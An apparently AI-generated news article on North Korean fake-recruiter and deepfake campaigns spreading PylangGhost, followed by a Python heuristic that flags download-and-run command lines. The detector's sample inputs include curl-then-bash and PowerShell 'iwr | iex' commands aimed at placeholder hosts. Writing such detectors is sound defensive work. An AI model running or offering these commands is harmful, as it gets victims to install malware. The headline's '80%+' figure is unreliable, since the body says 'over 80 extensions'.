North Korea Targets Crypto Professionals with 80%+ Malware Attacks

Generated by AI Agent Coin World
Thursday, Jun 19, 2025 11:52 pm ET

North Korea has been actively targeting professionals in the cryptocurrency and blockchain industries with a new wave of malware attacks. These attacks are being carried out through fake job sites and interviews, designed to lure unsuspecting job seekers into installing malicious software on their systems. The malware, known as PylangGhost, is capable of stealing login credentials, browser data, and crypto wallet information, targeting over 80 popular extensions such as MetaMask, Phantom, and 1Password.

The hacking group responsible for these attacks, known as Famous Chollima, has been focusing its efforts on job applicants in India. This group, which has been active since mid-2024 or earlier, has been creating fake job advertisements and skill-testing pages to trick potential victims. The fake applications mimic well-known crypto firms but do not use any of the real companies' actual branding. Instead, they ask questions that are hardly relevant to the supposed jobs in question.

The attack process begins with victims being lured through fake recruitment sites posing as well-known tech or crypto firms. After filling out applications, they are invited to a video interview. During this process, the site asks them to run command-line instructions, claimed to be for installing video drivers, which actually download and install the malware. Once installed, PylangGhost gives attackers full control of the victim's system, allowing them to steal sensitive information.

In addition to these phishing efforts, North Korean hackers have also been using deepfake technology to trick executives into installing malware. The advanced persistent threat group BlueNoroff, also known as Sapphire Sleet or TA444, has been using AI-generated video calls with deepfake bosses to deceive victims into installing malicious software. This sophisticated campaign has been successful in infiltrating systems at a crypto firm, highlighting the growing threat posed by state-sponsored hackers.

The use of deepfake technology in these attacks is a concerning development, as it allows hackers to create convincing and realistic video calls that can trick even the most vigilant individuals. This technology, combined with the use of fake job sites and interviews, makes it increasingly difficult for professionals in the crypto industry to protect themselves from these attacks.

In response to these threats, it is crucial for job seekers in the crypto industry to exercise caution when applying for jobs. They should be wary of unsolicited job offers, avoid running unknown commands, and secure their systems with endpoint protection, multi-factor authentication, and browser extension monitoring. Always verify the legitimacy of recruitment portals before sharing any sensitive information. By taking these precautions, professionals can better protect themselves from the growing threat of cyber attacks in the crypto industry.
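The advice to avoid running unknown commands can be backed by a simple screen for the shape of the fake "video driver" instruction: one command line that both downloads remote content and runs it. The Python heuristic below is an added example, not code from the article or from any vendor; the patterns, verdict names and sample commands are assumptions constructed for illustration.

```python
import re

# Tools that fetch remote content, and an http(s) URL on the same command line.
FETCH = re.compile(r"\b(curl|wget|invoke-webrequest|iwr|invoke-restmethod|irm)\b", re.I)
URL = re.compile(r"https?://[^\s'\"|;)]+", re.I)
# Fetched content piped straight into an interpreter.
PIPE_EXEC = re.compile(
    r"\|\s*(sudo\s+)?(bash|zsh|dash|sh|python3?|iex|invoke-expression)\b", re.I)
# A later chained step that starts an interpreter or a script file.
CHAIN_EXEC = re.compile(
    r"(&&|;)\s*(sudo\s+)?(bash|sh|python3?|wscript|cscript|powershell"
    r"|\S+\.(sh|vbs|py|ps1))\b", re.I)


def assess(command):
    """Return (verdict, reasons) for one command line a web page asks a user to run."""
    reasons = []
    urls = URL.findall(command)
    downloads = bool(FETCH.search(command) and urls)
    if downloads:
        reasons.append("fetches " + ", ".join(urls))
    executes = False
    if PIPE_EXEC.search(command):
        executes = True
        reasons.append("pipes the response into an interpreter")
    if CHAIN_EXEC.search(command):
        executes = True
        reasons.append("chains an interpreter or script after another step")
    if downloads and executes:
        return "block", reasons      # download and run in one line
    if downloads:
        return "review", reasons     # download only: inspect the file first
    return "allow", reasons


# Constructed sample inputs (not taken from the campaign); example.invalid never resolves.
SAMPLES = [
    "curl -k -o /tmp/drv.zip https://drivers.example.invalid/cam.zip && unzip -o /tmp/drv.zip -d /tmp/drv && bash /tmp/drv/install.sh",
    'powershell -c "iwr https://drivers.example.invalid/cam.ps1 | iex"',
    "curl -O https://downloads.example.invalid/release-notes.txt",
    "ls -la ~/Downloads",
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        verdict, reasons = assess(cmd)
        print(f"{verdict:6} {cmd}\n       {'; '.join(reasons) or 'no download-and-run pattern'}")
```

The same check can run over shell history or endpoint process-creation logs; a match is a prompt to look at the host, not proof of compromise.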
